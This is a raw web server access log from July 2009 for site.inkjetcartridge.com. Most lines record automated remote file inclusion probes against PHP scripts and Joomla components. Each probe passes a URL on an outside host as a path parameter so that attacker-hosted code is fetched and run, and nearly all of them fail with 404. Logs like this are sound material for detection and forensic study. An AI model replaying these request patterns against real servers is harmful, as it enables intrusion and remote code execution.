66.96.240.245 - - [01/Jul/2009:22:09:44 -0700] "GET /logs/access.log%20%20/admin/classes/TplLoad.php?full_path_to_public_program=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:22:09:56 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:22:09:56 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:22:09:56 -0700] "GET /logs/access.log%20%20/admin/classes/TplLoad.php?full_path_to_public_program=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:22:13:40 -0700] "GET /logs/scripts.log%20%20/admin/classes/TplLoad.php?full_path_to_public_program=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:22:13:56 -0700] "GET /logs/scripts.log%20%20/admin/classes/TplLoad.php?full_path_to_public_program=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:14:02 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:14:02 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:14:02 -0700] "GET /logs/access.log%20%20/admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:14:13 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:14:13 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:14:13 -0700] "GET /logs/access.log%20%20/admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.227.193.198 - - [01/Jul/2009:22:14:14 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.227.193.198 - - [01/Jul/2009:22:14:42 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:22:15:24 -0700] "GET /logs/access_090330.log/admin/classes/TplLoad.php?full_path_to_public_program=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:15:31 -0700] "GET /logs/scripts.log%20%20/admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:22:15:41 -0700] "GET /logs/scripts.log/admin/classes/TplLoad.php?full_path_to_public_program=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:22:15:44 -0700] "GET /logs/access_090330.log/admin/classes/TplLoad.php?full_path_to_public_program=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:15:50 -0700] "GET /logs/scripts.log%20%20/admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:22:16:01 -0700] "GET /logs/scripts.log/admin/classes/TplLoad.php?full_path_to_public_program=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.227.193.198 - - [01/Jul/2009:22:16:19 -0700] "GET /logs/scripts.log//include/mail.inc.php?skin_board_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:22:16:48 -0700] "GET /logs/access.log/admin/classes/TplLoad.php?full_path_to_public_program=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:22:17:21 -0700] "GET /logs/access.log/admin/classes/TplLoad.php?full_path_to_public_program=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:17:58 -0700] "GET /logs/access_090330.log/admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:18:06 -0700] "GET /logs/access_090330.log/admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:18:36 -0700] "GET /logs/access.log/admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:18:39 -0700] "GET /logs/access.log/admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:18:59 -0700] "GET /logs/scripts.log/admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [01/Jul/2009:22:19:09 -0700] "GET /logs/scripts.log/admin/classes/TplLoad.php?full_path_to_public_program=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.198.32.3 - - [01/Jul/2009:22:23:17 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
91.198.32.3 - - [01/Jul/2009:22:23:17 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
91.198.32.3 - - [01/Jul/2009:22:23:17 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
91.198.32.3 - - [01/Jul/2009:22:25:17 -0700] "GET /logs/access.log%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
203.211.145.195 - - [01/Jul/2009:22:29:31 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.211.145.195 - - [01/Jul/2009:22:29:31 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.211.145.195 - - [01/Jul/2009:22:29:31 -0700] "GET /include/mail.inc.php?skin_board_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
193.243.139.4 - - [01/Jul/2009:22:29:46 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
193.243.139.4 - - [01/Jul/2009:22:29:46 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
193.243.139.4 - - [01/Jul/2009:22:29:46 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
60.43.229.5 - - [01/Jul/2009:22:30:14 -0700] "GET /logs/access.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
60.43.229.5 - - [01/Jul/2009:22:30:14 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
60.43.229.5 - - [01/Jul/2009:22:30:14 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.206.120.187 - - [01/Jul/2009:22:30:29 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
193.243.139.4 - - [01/Jul/2009:22:31:08 -0700] "GET /logs/scripts.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
124.138.156.3 - - [01/Jul/2009:22:31:35 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
124.138.156.3 - - [01/Jul/2009:22:31:35 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
124.138.156.3 - - [01/Jul/2009:22:31:35 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:22:31:40 -0700] "GET /logs/access.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:22:31:40 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:22:31:41 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.211.145.195 - - [01/Jul/2009:22:32:57 -0700] "GET /logs/scripts.log%20%20//include/mail.inc.php?skin_board_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:22:33:12 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:22:33:12 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:22:33:12 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
60.43.229.5 - - [01/Jul/2009:22:33:45 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
193.243.139.4 - - [01/Jul/2009:22:34:35 -0700] "GET /logs/access_090330.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
193.243.139.4 - - [01/Jul/2009:22:35:13 -0700] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:22:36:23 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:22:36:31 -0700] "GET /logs/access.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.211.145.195 - - [01/Jul/2009:22:36:38 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.211.145.195 - - [01/Jul/2009:22:37:42 -0700] "GET /logs/scripts.log//include/mail.inc.php?skin_board_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
65.55.106.164 - - [01/Jul/2009:22:51:17 -0700] "GET /images/?N=D HTTP/1.1" 200 90945 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
65.55.106.210 - - [01/Jul/2009:23:12:26 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
119.63.193.75 - - [01/Jul/2009:23:23:17 -0700] "GET /phpbb/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "site.inkjetcartridge.com"
61.78.62.84 - - [01/Jul/2009:23:24:03 -0700] "GET /logs/access.log//rgboard/include/mail.inc.php?skin_board_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
61.78.62.84 - - [01/Jul/2009:23:24:03 -0700] "GET /rgboard/include/mail.inc.php?skin_board_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
61.78.62.84 - - [01/Jul/2009:23:24:03 -0700] "GET /logs//rgboard/include/mail.inc.php?skin_board_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
61.78.62.84 - - [01/Jul/2009:23:24:37 -0700] "GET /rgboard/include/mail.inc.php?skin_board_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "site.inkjetcartridge.com"
61.78.62.84 - - [01/Jul/2009:23:24:37 -0700] "GET /logs/access.log//rgboard/include/mail.inc.php?skin_board_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "site.inkjetcartridge.com"
61.78.62.84 - - [01/Jul/2009:23:24:38 -0700] "GET /logs//rgboard/include/mail.inc.php?skin_board_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "site.inkjetcartridge.com"
119.63.193.75 - - [01/Jul/2009:23:25:19 -0700] "GET /phpbb/viewtopic.php?p=2246 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "site.inkjetcartridge.com"
61.78.62.84 - - [01/Jul/2009:23:26:01 -0700] "GET /logs/scripts.log//rgboard/include/mail.inc.php?skin_board_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
61.78.62.84 - - [01/Jul/2009:23:26:44 -0700] "GET /logs/scripts.log//rgboard/include/mail.inc.php?skin_board_path=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "site.inkjetcartridge.com"
66.111.110.158 - - [01/Jul/2009:23:29:48 -0700] "GET /links/links19.html HTTP/1.1" 200 29321 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "site.inkjetcartridge.com"
91.198.32.3 - - [01/Jul/2009:23:31:32 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
91.198.32.3 - - [01/Jul/2009:23:31:32 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
91.198.32.3 - - [01/Jul/2009:23:31:32 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
72.10.166.250 - - [01/Jul/2009:23:32:32 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
72.10.166.250 - - [01/Jul/2009:23:32:32 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
72.10.166.250 - - [01/Jul/2009:23:32:32 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/pit-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
91.198.32.3 - - [01/Jul/2009:23:33:05 -0700] "GET /logs/access.log%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:35:41 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:35:41 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 1230 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:35:42 -0700] "GET /logs/access.log%20%20///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:35:55 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:35:55 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 1230 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:35:56 -0700] "GET /logs/access.log%20%20///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
81.19.66.84 - - [01/Jul/2009:23:36:31 -0700] "GET /links/links8_3.html HTTP/1.1" 200 17720 "-" "StackRambler/2.0 (MSIE incompatible)" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:36:39 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:36:40 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 1230 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:36:41 -0700] "GET /logs/access.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:37:05 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 1230 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:37:05 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:37:07 -0700] "GET /logs/access.log///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.98.222.18 - - [01/Jul/2009:23:37:09 -0700] "GET /errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.98.222.18 - - [01/Jul/2009:23:37:09 -0700] "GET /logs/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.98.222.18 - - [01/Jul/2009:23:37:09 -0700] "GET /logs/access.log/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.98.222.18 - - [01/Jul/2009:23:37:46 -0700] "GET /logs/access_090330.log/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
202.63.177.2 - - [01/Jul/2009:23:38:13 -0700] "GET /links/links.html HTTP/1.0" 200 19496 "http://www.inkjetcartridge.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.10 (intrepid) Firefox/3.0.4" "site.inkjetcartridge.com"
202.63.177.2 - - [01/Jul/2009:23:38:17 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.10 (intrepid) Firefox/3.0.4" "site.inkjetcartridge.com"
202.63.177.2 - - [01/Jul/2009:23:40:28 -0700] "GET /links/links3.html HTTP/1.0" 200 8685 "http://site.inkjetcartridge.com/links/links.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.10 (intrepid) Firefox/3.0.4" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:23:43:15 -0700] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:23:43:16 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:23:43:16 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:23:44:29 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:44:31 -0700] "GET /?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:44:32 -0700] "GET /logs//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:44:32 -0700] "GET /logs/access.log//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
202.63.177.2 - - [01/Jul/2009:23:45:53 -0700] "GET /links/links8.html HTTP/1.0" 200 21874 "http://site.inkjetcartridge.com/links/links.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.10 (intrepid) Firefox/3.0.4" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:23:46:39 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:49:38 -0700] "GET /?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.96.240.245 - - [01/Jul/2009:23:49:38 -0700] "GET /logs//?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
